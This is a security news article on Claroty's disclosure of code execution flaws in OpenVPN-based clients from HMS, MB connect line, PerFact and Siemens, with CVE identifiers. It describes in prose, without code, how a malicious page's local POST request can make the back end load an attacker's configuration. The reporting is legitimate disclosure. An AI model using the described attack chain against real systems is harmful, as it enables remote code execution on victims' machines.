Security Experts:

Connect with us

Hi, what are you looking for?


Application Security

Severe Code Execution Vulnerabilities Affect OpenVPN-Based Applications

Security researchers at Claroty have raised the alarm for a series of severe code execution vulnerabilities affecting virtual private network (VPN) solutions relying on OpenVPN.

Security researchers at Claroty have raised the alarm for a series of severe code execution vulnerabilities affecting virtual private network (VPN) solutions relying on OpenVPN.

The company documented four security errors in products from HMS Industrial Networks, MB connect line, PerFact, and Siemens that allow attackers to achieve code execution by tricking potential victims into visiting a maliciously crafted web page.

VPN solutions are designed to provide users with means to encrypt the traffic flowing between their devices and a specific network, to ensure that potentially sensitive data is transmitted securely, and OpenVPN is the most common implementation of a VPN solution.

During its analysis of OpenVPN-based solutions, Claroty discovered that vendors usually deploy OpenVPN as a service with SYSTEM privileges, which poses security risks, because any remote or local applications can control an OpenVPN instance to initiate or terminate a secured connection.

Typically, a VPN client-server architecture involves the presence of a front end (a GUI application), a back end (which receives commands from the front-end), and OpenVPN (a service controlled by the back end and responsible for the VPN connection).

Because in most cases cleartext protocol is used within the dedicated socket channel through which the front end controls the back end, without any form of authentication, “anyone with access to the local TCP port the back end listens on, could potentially load an OpenVPN config and force the back end to spawn a new OpenVPN instance with this configuration,” Claroty explained.

[ READ: NSA, CISA Issue Guidance on Selecting and Securing VPNs ]

 An attacker looking to exploit this flaw would simply need to trick the victim into accessing a malicious website containing embedded JavaScript code designed to send a blind POST request locally, to inject commands in the VPN client back end. This is a classic Server-Side Request Forgery (SSRF) case, the company said.

“Once the victim clicks the link, a HTTP POST request will be fired locally to the dedicated TCP port, and since HTTP is a cleartext based protocol which every line ends with n, the back end server will read and ignore all the lines until reaching a meaningful command,” according to Claroty’s documentation.

Because the back end server will automatically parse and execute any valid commands it may receive, it could be instructed to load a remote configuration file containing specific commands leading to code execution or the installation of malicious payloads.

“The attacker does not need to set up a dedicated OpenVPN server of their own because the up OpenVPN directive command is being executed before the connection to the OpenVPN server occurs,” Claroty said.

To achieve remote code execution, however, access to the attacker-controlled SMB server is needed, meaning that the attacker needs to either be on the domain network with the target system, or the victim computer set to allow SMB access to external servers, the researchers note.

A total of five CVE identifiers were issued based on Claroty’s research: CVE-2020-14498 (CVSS 9.6 – HMS Industrial Networks AB’s eCatcher), CVE-2021-27406 (CVSS 8.8 – PerFact’s OpenVPN-Client), CVE-2021-31338 (CVSS 7.8 – Siemens’ SINEMA RC Client), and CVE-2021-33526 and CVE-2021-33527 (CVSS 7.8 – MB connect line GmbH’s mbConnect Dialup).

Related: NSA, CISA Issue Guidance on Selecting and Securing VPNs

Related: Tens of Thousands of Unpatched Fortinet VPNs Hacked via Old Security Flaw

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join this webinar to learn best practices that organizations can use to improve both their resilience to new threats and their response times to incidents.


Join this live webinar as we explore the potential security threats that can arise when third parties are granted access to a sensitive data or systems.


Expert Insights

Related Content

Application Security

Cycode, a startup that provides solutions for protecting software source code, emerged from stealth mode on Tuesday with $4.6 million in seed funding.


Less than a week after announcing that it would suspended service indefinitely due to a conflict with an (at the time) unnamed security researcher...

Data Protection

The CRYSTALS-Kyber public-key encryption and key encapsulation mechanism recommended by NIST for post-quantum cryptography has been broken using AI combined with side channel attacks.

Data Protection

The cryptopocalypse is the point at which quantum computing becomes powerful enough to use Shor’s algorithm to crack PKI encryption.


The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.


WASHINGTON - Cyberattacks are the most serious threat facing the United States, even more so than terrorism, according to American defense experts. Almost half...

Application Security

PayPal is alerting roughly 35,000 individuals that their accounts have been targeted in a credential stuffing campaign.


No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.